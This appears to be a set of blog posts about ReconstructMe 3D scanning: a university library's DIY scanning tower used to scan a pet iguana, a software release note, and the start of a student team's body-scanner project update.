Erich Purpur

The DeLaMare Science & Engineering Library at the University of Nevada, Reno has undergone some drastic changes in the past few years and has become heavily used both as a place to study and as a makerspace. The notion of academic libraries incorporating makerspaces, which include collaborative learning spaces, cutting-edge technology, and knowledgeable staff, has seen more interest recently, and the DeLaMare Library has proven to be a popular and engaging model for the campus community.

Scan-O-Tron 3000





Let's flash back to December 2013, when Dr. Tod Colegrove, Head of DeLaMare Library, presented the latest edition of Make Magazine to me. Inside was an article written by Fred Kahl, who had built himself a large-scale 3D scanning tower and turntable for scanning large objects using ReconstructMe. Fred then took these 3D models and brought them to reality with his 3D printer. The DeLaMare Library had all the DIY capabilities to do the same, and the process of building the scanning station commenced.





In 2012 Mary Ann Prall, a resident of San Diego, CA, lost her friend Babe, an iguana who died at the age of 21 and has been frozen since. Mary Ann was looking to preserve her friend in a new format and came to us in hopes of printing Babe in 3D. At the time we only had a small handheld scanner, and with the help of our exceptional student employee, Crystal, we scanned Babe in sections and stitched them together using CAD programs.

Mary Ann, myself, and Crystal with Babe.

We invited Mary Ann and Babe back in April 2014 once we had completed the DIY 3D scanning tower. After mounting an Xbox Kinect sensor on the scanning tower, we purchased a single-use version of ReconstructMe and used it to scan Babe and create an accurate graphical representation. After taking several scans and playing with different variables, the results turned out great!

Me scanning Babe using ReconstructMe software. Crystal and Mary Ann watching.

Mary Ann happened to visit on a Friday, a popular day for prospective students to visit campus. During the scan many newcomers came in, and we had the opportunity to spark interest among the visitors as well as the many current University of Nevada students who happened to walk by.

Some UNR students admiring Babe.

We have not yet printed Babe but will in the near future. Last time, Mary Ann had Babe printed as a small model; this time we intend to print a much larger one.

Today we are happy to announce a new release of ReconstructMe UI and ReconstructMe SDK. The new UI supports 64-bit and can save OBJ files with texture, as outlined in our previous post. We’ve also made the surface scaling in Selfie 3D mode optional. The SDK release brings a couple of bug fixes for x64 support and better-tuned texturing parameters.





Hello everyone! We are the 3D Body Scanner team at North Carolina State University, and we are here with another blog update to show two important things. Pictures and progress! That’s right, we have a mid-project update for you all and a bunch of pictures of the team, our work, and where our project will be once we have completed it. The sponsor for our project, and the eventual home for our booth, is the Makerspace team at the James B. Hunt Jr. Library.
